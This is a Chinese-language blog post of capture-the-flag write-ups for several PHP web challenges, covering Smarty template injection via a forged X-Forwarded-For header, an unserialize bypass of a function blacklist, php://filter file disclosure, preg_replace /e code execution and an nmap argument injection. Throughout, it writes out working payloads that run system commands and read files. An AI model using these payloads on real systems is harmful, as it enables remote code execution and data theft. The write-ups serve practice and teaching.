# [BJDCTF2020]The mystery of ip

# image-20240428191224568

Flag 点进去看看,发现有个回显,是我的 ip 地址,着说明访问了我的 ip 地址,可以用伪造 IP 地址看看,这就想到用 X-Forwarded-For,可以看到不管我们输入什么都会回显,盲猜

# ssti 注入

# 输入 {config} 看看配置,是 smarty

image-20240428191821870

# 看看版本 {$smarty.version},上网找它特点呗

image-20240428191846842

# 也就是 if 是配对用的 if 和 /if,且 if 内可以运行 php 代码

{if system (“ls”)}{/if}, 这里的 flag.php 是假的,要查根目录下的

{if system(“cat /flag”)}{/if}
还有一种表达就是直接

image-20240428192441128

# [网鼎杯 2020 朱雀组] phpweb 1

1、打开界面之后界面一直在刷新,检查源代码也未发现提示信息,但是在检查中发现了两个隐藏的属性:func 和 p,抓包进行查看一下,结果如下:

img

img

2、对两个参数与返回值进行分析,我们使用 dat 时一般是这种格式:date (“Y-m-d+h:i:s+a”),那我们可以猜测 func 参数接受的是一个函数,p 参数接受的是函数执行的内容,我们可以输入参数 md5 和 1 进行测试,结果如下:

img

3、那我们就尝试读取下当前的目录信息,payload:func=system&p=ls,显示 hacking,应该是被过滤掉了,因此我们考虑读取下源码信息,payload:func=file_get_contents&p=php://filter/read=convert.base64-encode/resource=index.php,对获得的字母串进行 base64 解码,结果如下:

img

img

源码如下:

<?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
        $result = call_user_func($func, $p);
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];
    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
?>

4、在代码里注意到了__destruct () 函数,此函数会在类被销毁时调用,那我们如果反序列化一个类,在类里的参数中写上我们要执行的代码和函数,这样的话就会直接调用 gettime 函数,而不会执行 in_array (func,func,disable_fun),那我们就绕过了黑名单的判断,payload:func=unserialize&p=O:4:“Test”:2:{s:1:“p”;s:2:“ls”;s:4:“func”;s:6:“system”;} ,结果如下:

序列化代码:

<?php
class Test {
    var $p = "ls";
    var $func = "system";
    }
$test = new Test();
$str = serialize($test);
print($str);
?>

img

5、成功绕过黑名单获取到当前的目录信息,那我们就修改下传递的参数,查找下 flag 的位置信息,payload:func=unserialize&p=O:4:“Test”:2:{s:1:“p”;s:18:“find+/±name+flag*”;s:4:“func”;s:6:“system”;} ,结果如下:

序列化代码 (序列化之后注意将空格修改为 + 号,或者采用 get 方式进行传输):

<?php
class Test {
    var $p = "find / -name flag*";
    var $func = "system";
    }
$test = new Test();
$str = serialize($test);
print($str);
?>

img

6、获得 flag 文件位置信息后,修改传递的参数读取下 flag 值,payload:func=unserialize&p=O:4:“Test”:2:{s:1:“p”;s:22:“cat+/tmp/flagoefiu4r93”;s:4:“func”;s:6:“system”;} ,结果如下:

序列化代码如下 (序列化之后注意将空格修改为 + 号,或者采用 get 方式进行传输):

<?php
class Test {
    var $p = "cat /tmp/flagoefiu4r93";
    var $func = "system";
    }
$test = new Test();
$str = serialize($test);
print($str);
?>

img

7、这里补充下另外一种绕过黑名单的方式,第三步中的读取目录信息,可以修改 payload:func=\system&p=ls,也可以获得目录信息,结果如下;

img

8、然后后面的就是查找 flag 文件的位置、读取 flag 信息,结果如下:

img

img

9、\system 可以绕过黑名单的原因:php 内的 "\" 在做代码执行的时候,会识别特殊字符串。

# [BSidesCF 2020]Had a bad day

image-20240428194718770

抓包发现是 get 的请求有个注入点,可以进行修改,但是发现只能写含有 woofers and meowers 的单词

image-20240428194915353

再次写 woofers.php 试试

image-20240428195136220

发现 php 双写了,就可以确定加了一个.php 文件

后缀有.php 的可以想到 php 伪协议 php://filter/read=convert.base64-encode/resourse=index.php (这次将后缀删掉)

获取源码:

Had a bad day?

Cheer up!

Did you have a bad day? Did things not go your way today? Are you feeling down? Pick an option and let the adorable images cheer you up!

if(isset($file)) { if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){ include ($file . '.php'); } else{ echo "Sorry, we currently only support woofers and meowers."; } } ?> </div> <form action="index.php" method="get" id="choice"> <center><button onclick="document.getElementById('choice').submit();" name="category" value="woofers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Woofers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button> <button onclick="document.getElementById('choice').submit();" name="category" value="meowers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Meowers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button></center> </form> </div> </div> </main> </div> <script src="js/material.min.js"></script>

# php 伪协议添加一个必须要的单词不会影响正常的包含

php://filter/read=convert.base64-encode/woofers/resource=index

这样提交的参数既包含有 woofers 这个字符串,也不会影响正常的包含,得到 Flag.php:

img

解码得到 Flag:

<!-- Can you read this flag? -->
<?php
 // flag{a4aaba40-84f9-4b7a-b269-d025b03676a1}
?>

# [BJDCTF2020] ZJCTF,不过如此

4 月 27 日的题目 [ZJCTF 2019] NiZhuanSiWei

第二个 PHP 伪协议

所有的

?text=data://text/plain,I have a dream&file=php://filter/read=convert.base64-encode/resource=next.php

解码后的代码

$str) { echo complex($re, $str). "\n"; } function getFlag(){ @eval($_GET['cmd']); } 这里的漏洞出在**preg_replace** **/e** 模式下 e模式下的preg_replace可以让第二个参数'替换字符串'当作代码执行,但是这里第二个参数是不可变的,但因为有这种特殊的情况,正则表达式模式或部分模式两边添加圆括号会将相关匹配存储到一个临时缓存区,并且从1开始排序,而strtolower("\1")正好表达的就是匹配区的第一个(\\1=\1),从而我们如果匹配可以,则可以将函数实现。 比如我们传入 ?.*=**{${phpinfo()}}** 原句:preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str); 就变成preg_replace('/(' .* ')/ei','strtolower("\\1")',**{${phpinfo()}}**); 又因为$_GET传入首字母是非法字符时候会把 .(点号)改成下划线,因此得将\.*换成\s* 所有payload:?\S*=${getFlag()}&cmd=system('ls /'); ![img](https://img2022.cnblogs.com/blog/2729166/202206/2729166-20220627134114716-1034484069.png) 终于看到了flag,然后将cmd里改成cat /flag即可 ?\S*=${getFlag()}&cmd=system('cat /flag'); ![img](https://img2022.cnblogs.com/blog/2729166/202206/2729166-20220627134226627-1152733174.png) ## [BUUCTF 2018]Online Tool ![image-20240428210310186](C:\Users\86182\Desktop\myBlog\assets\image-20240428210310186.png) nmap -T5 -sT -Pn --host-timeout 2 -F host -T<0-5> : 速度/时间模板参数,指定了扫描的速度。 -sT : 使用TCP进行扫描。 -Pn : 将所有主机视为在在线,跳过主机发现。 --host-timeout : 设置超时时间。设置为2秒,即如果目标主机在2秒内没有响应,Nmap将放弃该主机的扫描。 -F : 进行快速扫描,用于快速识别目标主机上开放的常见端口,而不扫描所有的端口。 > escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数 > 功能 :`escapeshellarg()` 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号, > 这样以确保能够直接将一个字符串传入 shell 函数,shell 函数包含 `exec()`, `system()` 执行运算符(反引号) > escapeshellcmd — shell 元字符转义 > 功能:`escapeshellcmd()` 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 > 此函数保证用户输入的数据在传送到 `exec()` 或 `system()` 函数,或者 执行操作符 之前进行转义。 > > 反斜线(\)会在以下字符之前插入: > &#;`|?~<>^()[]{}$*, \x0A 和 \xFF*。 *’ 和 “ 仅在不配对儿的时候被转义。 > 在 Windows 平台上,所有这些字符以及 % 和 ! 字符都会被空格代替。 构建payload:`?host=' -oG hack.php '`

image-20240428210330513

Edited on

Give me a cup of [coffee]~( ̄▽ ̄)~*

odiws WeChat Pay

WeChat Pay

odiws Alipay

Alipay

odiws PayPal

PayPal